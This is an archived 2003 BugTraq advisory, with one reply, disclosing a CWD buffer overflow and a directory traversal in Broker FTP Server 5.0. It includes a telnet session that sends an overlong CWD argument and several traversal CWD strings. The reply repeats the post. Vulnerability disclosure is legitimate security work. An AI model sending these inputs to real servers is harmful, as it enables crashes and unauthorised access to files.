BugTraq
Back to list
|
Post reply
Buffer Overflow in Broker FTP Server
Mar 30 2003 07:32PM
subj (r2subj3ct dwclan org)
(1 replies)
Product : Broker FTP Server
Version : 5.0
OSystem : Windows
Authors : TransSoft
WebSite : http://www.ftp-broker.com
Problem :
* Buffer Overflow in field CWD
* Access to all files on a disk
#[Denial of Service]#
Description:
------------
eng:
====
To arrange overflow in field CWD, necessary to send on it more than 256
bytes of dust.
After that server will fall, and will not submit any life attributes.
Exploit:
--------
*************************************
>>Telnet 127.0.0.1:21
220 FTP Server Ready [***]
>>USER anonymous
331 Password required for anonymous.
>>PASS anonymous@localhost
230-Welcome to Broker FTP Server.
230-
230 User anonymous logged in.
CWD AAAAAAAAAAA......AAAAA [256b]
*************************************
#[Access to all files on a disk]#
Description:
------------
rus:
====
За счет этой уязвимости вы можете получить доступ ко всем файлам на
жестком диске сервера
eng:
====
Due to this vulnerability you can get access to all files on a hard drive
of the server
Exploits:
Current Directory : "/"
CWD *
CWD /*
CWD /..
CWD /...
CWD /.../
Contacts:
---------
r2subj3ct (at) dwclan (dot) org [email concealed]
subj.24h.to (www.dwcgr0up.com/subj/)
www.dwcgr0up.com
irc.dwcgr0up.biz #dwc
Thanks:
-------
DHG, GipsHack, Netp0is0n, de1irium, r00tc0de, f0kp, exploit.ru, nobodies
DethSpirit, r4ShRaY, D4rkGr3y, Moby, Orb, Foster, Owned, prior, Demon.
[ reply ]
Re: Buffer Overflow in Broker FTP Server
Apr 08 2003 05:26PM
Knud Erik Højgaard (kain ircop dk)
Privacy Statement
Copyright 2010, SecurityFocus
Product : Broker FTP Server
Version : 5.0
OSystem : Windows
Authors : TransSoft
WebSite : http://www.ftp-broker.com
Problem :
* Buffer Overflow in field CWD
* Access to all files on a disk
#[Denial of Service]#
Description:
------------
eng:
====
To arrange overflow in field CWD, necessary to send on it more than 256
bytes of dust.
After that server will fall, and will not submit any life attributes.
Exploit:
--------
*************************************
>>Telnet 127.0.0.1:21
220 FTP Server Ready [***]
>>USER anonymous
331 Password required for anonymous.
>>PASS anonymous@localhost
230-Welcome to Broker FTP Server.
230-
230 User anonymous logged in.
CWD AAAAAAAAAAA......AAAAA [256b]
*************************************
#[Access to all files on a disk]#
Description:
------------
rus:
====
За счет этой уязвимости вы можете получить доступ ко всем файлам на
жестком диске сервера
eng:
====
Due to this vulnerability you can get access to all files on a hard drive
of the server
Exploits:
Current Directory : "/"
CWD *
CWD /*
CWD /..
CWD /...
CWD /.../
Contacts:
---------
r2subj3ct (at) dwclan (dot) org [email concealed]
subj.24h.to (www.dwcgr0up.com/subj/)
www.dwcgr0up.com
irc.dwcgr0up.biz #dwc
Thanks:
-------
DHG, GipsHack, Netp0is0n, de1irium, r00tc0de, f0kp, exploit.ru, nobodies
DethSpirit, r4ShRaY, D4rkGr3y, Moby, Orb, Foster, Owned, prior, Demon.
[ reply ]